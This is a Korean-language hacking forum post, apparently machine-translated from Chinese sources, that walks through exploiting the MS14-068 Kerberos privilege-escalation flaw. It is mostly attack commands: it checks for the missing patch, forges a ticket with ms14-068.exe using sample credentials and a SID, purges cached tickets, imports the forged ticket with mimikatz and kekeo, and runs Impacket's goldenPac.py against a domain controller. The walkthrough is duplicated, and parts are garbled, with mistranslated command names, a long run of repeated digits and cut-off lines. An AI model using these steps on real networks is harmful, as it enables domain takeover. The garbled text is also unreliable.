KoreanHackerTeam
Moderator
MS14-068
MS14068은 일반 사용자가 도메인 제어 권한에 대한 권한을 높일 수있는 권한 에스컬레이션 취약성입니다. 공격자는 특정 요청 패킷을 구성하여 권한을 높이기위한 목적을 달성 할 수 있습니다.
이 취약점의 주요 문제는 KDC가 PAC의 디지털 서명과 PAC의 암호화 알고리즘을 지정하는 암호화 알고리즘을 기반으로 PAC의 정당성을 확인할 것입니다. 이를 통해 공격자는 PAC를 단조하여 PAC에서 SID를 수정하여 KDC가 공격자가 유명한 사용자임을 판단하여 권한 에스컬레이션 취약성이 발생할 수 있습니다.
취약성 패치 주소 주소 : https://technet.microsoft.com/zh-cn/library/security/ms14-068
1SystemInfo | 찾기 '3011780'
exe : https://github.com/ianxtianxt/ms14-068
매개 변수 설명 :
-U 도메인 계정 @도메인 이름
-P는 현재 사용자의 비밀번호입니다
-S는 현재 사용자의 SID 값입니다. 사용자의 SID 값은 Whoami/All을 통해 얻을 수 있습니다.
-D는 현재 도메인의 도메인 제어입니다
–RC4 현재 사용자를위한 해시
DIR을 통해 도메인 제어 공유 폴더에 대한 액세스가 거부 될 액세스 권한이 있습니다. 1dir \\ owa2013.rootkit.org \ C $
티켓 1ms14-068.exe -u [email protected] -p admin12345 -s s-1-5-21-375981954-2993291187-3577547808-1613 -D OWA2013.ROOTKIT.org.
스크립트가 성공적으로 실행되면 현재 디렉토리에서 CCACHE 파일이 생성됩니다. 티켓을 가져 오기 전에 CMD의 명령 klist 퍼지를 사용하거나 Mimikatz에서 Kerberos
urge를 사용하여 현재 캐시 된 Kerberos 티켓을 삭제하십시오. 1klist 퍼지
mimikatz 1mimikatz 'kerberos3
tc [email protected]'Exit을 사용하여 생성 된 CCACH 파일 가져 오기
DIR로 도메인 제어 공유에 성공적으로 액세스 할 수 있습니다.
1python goldenpac.py -dc-ip 192.168.3.144 -Target-IP 192.168.3.144 rootkit.org/sqladmin:[email protected]
daiker.gitbook.io
www.cnblogs.com
MS14-068
https://www.se7ensec.cn/2021/10/20/域渗透-Kerberos% E5%9f%9f%E8%AE%A4%E8%AF%81%E6%9C%BA%E5%88%B6%E5%89%96%E6%9E%90/#PAC-1MS14068은 일반 사용자가 도메인 제어 권한에 대한 권한을 높일 수있는 권한 에스컬레이션 취약성입니다. 공격자는 특정 요청 패킷을 구성하여 권한을 높이기위한 목적을 달성 할 수 있습니다.
이 취약점의 주요 문제는 KDC가 PAC의 디지털 서명과 PAC의 암호화 알고리즘을 지정하는 암호화 알고리즘을 기반으로 PAC의 정당성을 확인할 것입니다. 이를 통해 공격자는 PAC를 단조하여 PAC에서 SID를 수정하여 KDC가 공격자가 유명한 사용자임을 판단하여 권한 에스컬레이션 취약성이 발생할 수 있습니다.
취약성 패치 주소 주소 : https://technet.microsoft.com/zh-cn/library/security/ms14-068
利用方式
MS14-068의 해당 패치는 KB3011780입니다. 이 패치가 도메인 컨트롤의 SystemInfo를 통해 설치되어 있는지 확인할 수 있습니다.1SystemInfo | 찾기 '3011780'
keoko
12klist 퍼지는 퍼지 클리어 빌 Clear Bill Kekeo 'Exploit333333333333333:rootkit.org /user3:sqladmin /password3:admin12345 /ptt' ':10101010101010101010101010101010110101010101010 PY : https://github.com/mubix/pykekexe : https://github.com/ianxtianxt/ms14-068
매개 변수 설명 :
-U 도메인 계정 @도메인 이름
-P는 현재 사용자의 비밀번호입니다
-S는 현재 사용자의 SID 값입니다. 사용자의 SID 값은 Whoami/All을 통해 얻을 수 있습니다.
-D는 현재 도메인의 도메인 제어입니다
–RC4 현재 사용자를위한 해시
DIR을 통해 도메인 제어 공유 폴더에 대한 액세스가 거부 될 액세스 권한이 있습니다. 1dir \\ owa2013.rootkit.org \ C $
티켓 1ms14-068.exe -u [email protected] -p admin12345 -s s-1-5-21-375981954-2993291187-3577547808-1613 -D OWA2013.ROOTKIT.org.
스크립트가 성공적으로 실행되면 현재 디렉토리에서 CCACHE 파일이 생성됩니다. 티켓을 가져 오기 전에 CMD의 명령 klist 퍼지를 사용하거나 Mimikatz에서 Kerberos

mimikatz 1mimikatz 'kerberos3

DIR로 도메인 제어 공유에 성공적으로 액세스 할 수 있습니다.
Pykek
GoldenPac.py Impacket 도구 키트 에서이 도구는 MS14-068 PSEXEC를 결합하는 제품으로 사용하기 쉽습니다.1python goldenpac.py -dc-ip 192.168.3.144 -Target-IP 192.168.3.144 rootkit.org/sqladmin:[email protected]
goldenPac

Microsoft 安全公告 MS14-068 - 严重
docs.microsoft.com
PAC | windows protocol


Kerberos域用户提权漏洞(MS14-068)分析与防范-腾讯云开发者社区-腾讯云
大家好,这里是 渗透攻击红队 的第 36 篇文章,本公众号会记录一些我学习红队攻击的复现笔记(由浅到深),不出意外每天一更
cloud.tencent.com
(转)MS14-068域内提权漏洞总结 - 渗透测试中心 - 博客园
0x01 漏洞起源 说到ms14-068,不得不说silver ticket,也就是银票。银票是一张tgs,也就是一张服务票据。服务票据是客户端直接发送给服务器,并请求服务资源的。如果服务器没有向域控dc验证pac的话,那么客户端可以伪造域管的权限来访问服务器。所以ms14-068的来源和银票是息息